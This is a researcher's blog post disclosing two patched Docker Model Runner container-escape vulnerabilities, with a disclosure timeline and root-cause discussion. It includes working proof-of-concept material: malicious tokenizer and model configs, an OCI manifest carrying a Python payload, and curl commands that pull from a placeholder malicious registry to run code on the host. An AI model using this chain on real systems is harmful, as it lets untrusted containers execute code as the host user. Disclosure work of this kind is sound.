Disclaimer: This research was conducted independently. Views expressed are my own and do not represent my employer.
Introduction
A while back I published CVE-2026-33990, an SSRF in Docker Model Runner’s OCI authentication flow that let a container enumerate host-local services. Shortly after discovering that vulnerability, I found several other OCI related vulnerabilities, such as SSRF in Ollama along with a few others.
After realizing what could be possible with a malicious OCI registry, I spent days digging into various OCI clients, like the ones used by Azure, AWS, GCP, and of course, Docker. One night around 2am, I discovered a way to execute arbitrary code from any container using only default configuration and immediately reported to Docker. By this point, my eyes were fried and I hit a roadblock when developing the end to end exploit, but @gouldnicholas helped me turn the initial findings into a full Container Escape.
What is DMR?
Docker Model Runner (DMR) is a platform service built into Docker Desktop that provides AI inference. You pull a model from inside a container, DMR loads it on the host, and you get inference results back over an internal HTTP API. What I found quite alarming is that it runs them as host processes, as the logged-in user, with full access to the filesystem.
This gives you the perfect avenue to cross the container-host boundary without the need for fancy runtime or kernel exploits. Docker packaged it up nicely through an internal API that, until I disclosed this vulnerability, was enabled by default for all users.

Meaning, if you were to pop a shell on a container, congratulations, you can now interact with an internal API by default that allows you to pull and download files onto the underlying host. Part of Dockers swift remediation efforts included disabling Docker Model Runner by default for all users. Now you must intentionally go into settings and enable this feature, which is good I suppose.
A little more information on the internal model runner API. Every container on your Docker network can reach it at http://model-runner.docker.internal, which was enabled by default since Desktop 4.46.0, with no authentication on any endpoint. Again, the attack surface here is impressive. A container, that is supposed to be completely isolated and blocked off from the host, can just use the internal API to pull, push, delete, and run inference using models from ANY remote registry. So why wouldn’t I just setup a remote registry that serves malicious files onto the host and abuse this?
Sandbox? What Sandbox?
DMR supports multiple inference backends, such as llama.cpp, vllm-metal, mlx-lm, and SGLang. Typically inference engines prevent malicious model files from causing harm by sandboxing them. llama.cpp has a sandbox profile applied to it so the process runs with restricted privileges. Every Python-based backend (vllm-metal, mlx-lm, SGLang) has SandboxConfig: "". Empty string, no sandbox. These processes run directly on the host.

So TLDR is that we have an internal API that allows us to cross the container-host boundary with zero additional configuration or consent, ability to pull models onto the underlying host, and ability run inference directly on the host with no sandbox configuration.
CVE-2026-5817: vllm-metal and trust_remote_code=True
The Vulnerability
HuggingFace transformers has a feature called trust_remote_code. When a model’s tokenizer_config.json includes an auto_map entry pointing to a custom Python file, transformers will load and execute that file at tokenizer initialization, but only if the caller explicitly passes trust_remote_code=True. The default is False. This gate exists specifically because the behavior is arbitrary code execution by design, but it has to explicitly be enabled because of the obvious security risk.
vllm-metal’s model_runner.py hardcoded it to True:
# vllm_metal/model_runner.py
self.model, self.tokenizer = mlx_load(
model_name,
tokenizer_config={"trust_remote_code": True},
)

No configuration or consent necessary. Any model loaded by vllm-metal gets to execute arbitrary Python at tokenizer load time. All you have to do is literally give it a Python file to run.
Building the Malicious Model
To exploit this, you need a model that passes the auto_map to transformers and includes the Python file to execute. The OCI layer format Docker uses for model distribution supports arbitrary files via org.cncf.model.filepath annotations, so .py files pass through extraction without any filtering.
The tokenizer_config.json just needs to point at our payload:
{
"auto_map": {
"AutoTokenizer": ["evil_tokenizer.EvilTokenizer", "evil_tokenizer.EvilTokenizer"]
},
"tokenizer_class": "EvilTokenizer",
"model_max_length": 2048
}
And evil_tokenizer.py is whatever you want to run on the host. Check out the PoC for an example of how this can be used to write arbitrary files to the host :)
Escaping the Container via Inference
From an unprivileged container, no --privileged, no Docker socket, no volume mounts:
# pull the malicious model
curl -X POST http://model-runner.docker.internal/api/pull \
-H 'Content-Type: application/json' \
-d '{"name":"YOUR-MALICIOUS-REGISTRY:5555/evil/esecape-model:latest"}'
# trigger inference, which loads the tokenizer, which runs evil_tokenizer.py on the host
curl --max-time 120 -X POST \
http://model-runner.docker.internal/engines/v1/chat/completions \
-H 'Content-Type: application/json' \
-d '{"model":"localhost:5555/evil/esecape-model:latest","messages":[{"role":"user","content":"hello"}]}'
This was reported to Docker on April 6th as soon as it was discovered.
The Quick “Fix”
On April 7th, less than 24 hours later, Docker Desktop 4.68.0 shipped. The update included a newer version of vllm-metal, and the newer version had reorganized its code. The old vllm_metal/model_runner.py with the hardcoded trust_remote_code=True was gone, replaced by a restructured vllm_metal/v1/model_runner.py that reads trust_remote_code from the vllm config object instead:
# vllm_metal/v1/model_runner.py (patched version)
self.model, self.tokenizer = mlx_lm_load(
model_name,
tokenizer_config={
"trust_remote_code": self.model_config.trust_remote_code
},
)
That config value defaults to False. This was quite literally 12 +- hours after reporting the vulnerability.
The change actually happened inside the vllm-metal package itself. Docker’s contribution was shipping the updated version. Whether that happened because of the report or whether it was a routine dependency bump that landed at a very convenient time, we genuinely don’t know. The changelog didn’t mention it and the report hadn’t been acknowledged yet. All I know is that less than 24 hours after reporting this vulnerabilty, our working container-to-host RCE exploit broke.

But, we knew that if theres one vulnerability, theres likely more, so we started digging into the other inference backend configurations.
Our first question was obviously: do any of the other Python backends load files from the model directory without gating it behind trust_remote_code? The vllm-metal fix had only closed the HuggingFace tokenizer path. mlx-lm, the backend Docker uses for Apple Silicon MLX inference, was next on the list.
We pulled up mlx_lm/utils.py and sure enough, we found a bypass to the timely fix.
CVE-2026-5843: mlx-lm’s model_file and importlib
The Bug
Lines 313–319 of mlx_lm/utils.py:
if (model_file := config.get("model_file")) is not None:
spec = importlib.util.spec_from_file_location(
"custom_model",
model_path / model_file,
)
arch = importlib.util.module_from_spec(spec)
spec.loader.exec_module(arch)
If a model’s config.json has a "model_file" key, mlx-lm takes the value, builds a path relative to the model directory, and executes it as a Python module via importlib. TLDR give it a Python file and it will run it in the unsandboxed backend.
For comparison, here’s how HuggingFace handles the same scenario in dynamic_module_utils.py:
# transformers/dynamic_module_utils.py
def resolve_trust_remote_code(trust_remote_code, model_name, has_local_code, has_remote_code):
if has_remote_code and not trust_remote_code:
raise ValueError(
f"Loading {model_name} requires you to execute the configuration file in that"
" repo on your local machine. Make sure you have read the code there to avoid"
" malicious use, then set the option `trust_remote_code=True`..."
)
mlx-lm has nothing like this.
We also reported this to Apple through their VDP. Their response was that this is expected behavior, as the library is designed to load custom model files, so executing them is working as intended.

It was quite surprising considering HuggingFace looked at the exact same use case and decided it was dangerous enough to require an explicit opt-in.
Apple shipping a library that executes arbitrary Python from a config key with no warning, no gate, and no documentation that this is happening isn’t that surprising considering how fast AI tech is moving. Maybe the responsibility is on the end user/consumer to implement the security safeguards.
Exploiting the bug
We used the same primitives as before. The only changes are the backend endpoint and a different config key.
config.json gets one extra field:
{
"model_file": "model.py",
"architectures": ["LlamaForCausalLM"],
"model_type": "llama",
...
}
The full manifest for the three-layer bundle:
{
"schemaVersion": 2,
"mediaType": "application/vnd.oci.image.manifest.v1+json",
"config": {
"mediaType": "application/vnd.docker.ai.model.config.v0.1+json",
"digest": "sha256:<model-config-digest>",
"size": 123
},
"layers": [
{
"mediaType": "application/vnd.docker.ai.safetensors",
"digest": "sha256:<weights-digest>",
"size": 12345,
"annotations": {"org.cncf.model.filepath": "model.safetensors"}
},
{
"mediaType": "application/vnd.docker.ai.model.file",
"digest": "sha256:<config-digest>",
"size": 456,
"annotations": {"org.cncf.model.filepath": "config.json"}
},
{
"mediaType": "application/vnd.docker.ai.model.file",
"digest": "sha256:<payload-digest>",
"size": 200,
"annotations": {"org.cncf.model.filepath": "model.py"}
}
]
}
model.py is the payload. It needs to export Model and ModelArgs classes so mlx-lm doesn’t crash after the import.
Below is a benign, harmless POC to drop a file to the host Desktop to demonstrate impact.
import os, socket, time
desktop = os.path.expanduser("~/Desktop")
os.makedirs(desktop, exist_ok=True)
with open(os.path.join(desktop, "mlx.txt"), "w") as f:
f.write(f"Hostname: {socket.gethostname()}\n")
f.write(f"User: {os.popen('whoami').read().strip()}\n")
f.write(f"UID: {os.popen('id').read().strip()}\n")
f.write(f"Time: {time.ctime()}\n")
# mlx-lm expects these after the import
import mlx.nn as nn
import dataclasses
@dataclasses.dataclass
class ModelArgs:
hidden_size: int = 64
...
class Model(nn.Module):
def __init__(self, args): super().__init__()
def __call__(self, x, **kw): return x
def sanitize(self, w): return w
From an unprivileged container:
curl -X POST http://model-runner.docker.internal/api/pull \
-H 'Content-Type: application/json' \
-d '{"name":"YOUR-MALICIOUS-REGISTRY:5555/evil/esecape-model:latest"}'
curl --max-time 120 -X POST \
http://model-runner.docker.internal/engines/mlx/v1/chat/completions \
-H 'Content-Type: application/json' \
-d '{"model":"localhost:5555/evil/esecape-model:latest","messages":[{"role":"user","content":"hi"}]}'
This was identified the same day 4.68.0 shipped and reported to Docker on April 7th.
Who’s to Blame Here?
Both bugs involve third-party libraries doing something unsafe, but arguably functioning as intended. It would be easy to chalk these up as “mlx-lm bug” and “vllm-metal bug” and move on.
mlx-lm’s model_file feature is working as designed as it was built for researchers loading custom architectures locally. HuggingFace’s trust_remote_code=True is a documented feature that exists for exactly this use case. In my opinion, neither library was built with the idea that untrusted model directories arrive from a network API exposed to every container on your machine.
So,
- Docker exposes Model Runner to every container via an unauthenticated API. Any container can pull a model from any registry.
- Docker extracts OCI layers, including
.pyfiles, directly into model bundle directories with no filtering. - Docker runs the Python backends unsandboxed on the host. Only llama.cpp has a sandbox profile. An empty
SandboxConfig: ""for everything else. - Docker does not inspect model configs for dangerous keys like
model_filebefore handing the directory to a backend.
Even if both upstream libraries had been patched first to somehow require additional configuration for use/exploitation, Docker’s architecture would have produced the same result with the next library-level code execution path.
The systemic issue is the combination of unsandboxed host execution and unauthenticated model runner API access from all containers by default.
The Actual Fix
Docker patched CVE-2026-5843 in Desktop 4.71.0, released April 27th. The fix applied sandboxing to the Python backends and added blob digest verification before download. Previously you could serve a model manifest where the actual blob digest didn’t match what was advertised. This should have been tracked as a seperate vulnerability in my opinion as it is unrelated to the RCE vulnerability.
Anyways,
If you’re running Docker Desktop on Apple Silicon with Model Runner enabled, make sure you’re on 4.71.0 or later, and keep your eyes peeled for any Docker Updates in the future as 0days are dropping quicker than ever.
Impact
- Any container on a vulnerable Docker Desktop host can execute arbitrary code as the host user
- No
--privileged, no Docker socket, no volume mounts required - Docker Model Runner is enabled by default since Desktop 4.46.0
- A compromised web app container, a malicious Compose dependency, a supply chain compromise, any of these can reach
model-runner.docker.internal
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-04-06 | CVE-2026-5817 (trust_remote_code) reported to Docker Security |
| 2026-04-07 | Docker Desktop 4.68.0 ships with updated vllm-metal, CVE-2026-5817 no longer exploitable |
| 2026-04-07 | CVE-2026-5843 (mlx-lm model_file) identified and reported to Docker Security |
| 2026-04-27 | Docker Desktop 4.71.0 released, CVE-2026-5843 patched, Python backends sandboxed |
Docker shipped the fix for CVE-2026-5817 on April 7th and CVE-2026-5843 in version 4.71 on April 27th but delayed disclosing these vulnerabilities for a few weeks.
In the end, Docker triaged and fixed these reports quickly compared to most VDPs right now. Bug Bounty and VDPs are being absolutely overloaded with AI auto submissions, so while we would have preferred public disclosure sooner, 45 days from initial vulnerability disclosure is still fast. We appreciate their responsiveness and commitment to security.
Links
- CVE: CVE-2026-5817
- PoC: CVE-2026-5817
- CVE: CVE-2026-5843
- PoC: CVE-2026-5843
Thanks for reading <3